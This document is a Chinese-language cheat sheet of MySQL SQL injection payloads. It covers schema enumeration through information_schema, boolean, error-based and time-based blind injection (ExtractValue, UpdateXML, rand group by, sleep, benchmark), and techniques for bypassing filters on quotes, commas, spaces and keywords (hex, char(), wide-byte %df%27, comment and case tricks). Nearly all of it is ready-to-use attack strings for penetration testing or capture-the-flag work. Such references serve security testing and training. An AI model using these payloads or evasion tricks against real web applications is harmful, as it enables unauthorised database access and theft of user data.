SQLi速查

注入语句

数据库

1
2
3
SELECT database();
SELECT schema();
SELECT schema_name FROM information_schema.schemata;

表名

1
2
3
4
SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA=database();
SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;
SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema!='information_schema' AND table_schema!='mysql';
select table_name from mysql.innodb_table_stats where database_name=schema();

列名

1
SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'

列名反查表名

1
2
SELECT table_name FROM information_schema.columns WHERE column_name = 'username';
SELECT table_name FROM information_schema.columns WHERE column_name LIKE '%user%';

注入技术

布尔型

1
2
3
4
5
6
7
AND SELECT ASCII(SUBSTR(table_name,1,1)) FROM information_schema.tables > 97
-- 字符串相关
substr() mid() left() right() locate() instr() lpad() rpad() soundex() find_in_str()
-- 字符串转化
ascii() ord() hex() unhex() chr()
-- 正则注入
select user() regexp '^[a-z]';

报错型

Xpath

1
2
3
4
-- ExtractValue()
and ExtractValue(1,concat('?',(select table_name from information_schema.tables)))
-- UpdateXML()
SELECT UpdateXML('<a><b>X</b><b>Y</b></a>',concat('?',version()),'hacked');

rand() group by

1
2
3
4
5
6
-- 必然报错 但是需要数据库中有三条以上语句
SELECT COUNT(*),CONCAT((SELECT user()),FLOOR(RAND(0)*2))x from test group by x;
-- 不必然 但是只需要两条以上数据
SELECT COUNT(*),CONCAT((SELECT user()),FLOOR(RAND(0)))x from test group by x;
-- rand()被禁止 使用临时变量报错
select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2);

exp

1
2
-- double数值类型超出范围 http://www.cnblogs.com/lcamry/articles/5509124.html
select exp(~(select * FROM(SELECT USER())a))

bigint溢出

1
2
-- http://www.cnblogs.com/lcamry/articles/5509112.html
select !(select * from (select user())x) - ~0

NAME_CONST

1
2
-- 利用MySQL重复特性
select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;

others

1
2
3
4
5
6
7
8
9
-- 数据库名
?id = info()
select * from users where uid =1-a();
-- 表名 multiPolygon() multilinestring() linestring() GeometryCollection() MultiPoint() polugon()
?id = 1 and linestring(id)
-- 字段名
select * from test where id =1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from test)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
select name from test where id=1 and (select * from (select * from test as a join test as b using(id)) as c);
select name from test where id=1 and (select * from (select * from test as a join test as b) as c);

延时注入

1
2
3
4
5
6
7
8
9
10
11
12
-- sleep
select sleep(5);
-- benchmark
select benchmark(10000000,sha(1));
-- 笛卡儿积
SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
SELECT * FROM [TABLE 1] CROSS JOIN [TABLE 2]
-- get_lock 需要两个session
select get_lock('test',1); /*session A*/
select get_lock('test',5); /*session B*/
-- rlike
select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');

bypass

绕过引号

1
2
3
4
5
6
7
-- hex 编码
SELECT * FROM Users WHERE username = 0x61646D696E
-- char() 函数
SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)
-- 宽字节
%bf%27 %aa%27 %df%27
-- 代码中的字符串截断功能

字符串黑名单

1
2
3
4
5
6
7
8
9
10
11
SELECT 'a' 'd' 'mi' 'n';
-- concat() cancat_ws() group_concat() 函数
SELECT CONCAT('a', 'd', 'm', 'i', 'n');
-- 双写 大小写
ununionion UnIon
-- 注释绕过
/*!union*/
-- pi() floor() sqrt() 等函数构造数字
floor(sqrt(floor(pi()))) == 1
-- {}
select {x username}from{x users}

特殊函数

1
2
3
4
5
6
7
8
-- 字符串截断
substr substring mid lpad rpad left right reverse
-- 字符串连接
concat concat_ws
-- 字符转化
chr hex unhex ascii ord
-- 判断函数
and or if() elt() fielt()

绕过逗号

1
2
3
4
5
limit x offset x
substr(XXX from X for X) /*字符截断*/
case XXX when XXX then XXX /*延时盲注*/
-- join 绕过
union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);

绕过空格

1
2
3
4
5
6
7
8
-- 注释绕过 /**/
union/**/select/**/*/**/from/**/1,2,3,4;
-- urlencode
09 0a 0b 0c 0d a0 20
-- 单纯括号
select(user())from dual where(1=1)and(2=2)
(sleep(ascii(mid(user()from(2)for(1)))=109)) /*延时盲注*/
-- 加号

SQL语句截断

1
# -- `

字段名被过滤

1
select c.2 from (select * from (select 1)a join (select 2)b union select * from test limit 1 offset 1)c

技巧

利用 order by 注入

1
2
order by 由于是排序语句,所以可以利用条件语句做判断,根据返回的排序结果不同判断条件的真假
order = rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128))

group by with rollup offset 可以构造NULL作为SQL语句的返回结果

desc

1
$sql = "desc `sqli` `随便啥都可以`"; //这个是可以正确执行的

在sql中

1
`id` = id 和 1 = 1 是等价的

移位溢注

1
select 1,2,3,4,5,6,7,8,9,10 from news where id =1 union select 1,2,3,admin.*,7,8,9,10 from admin;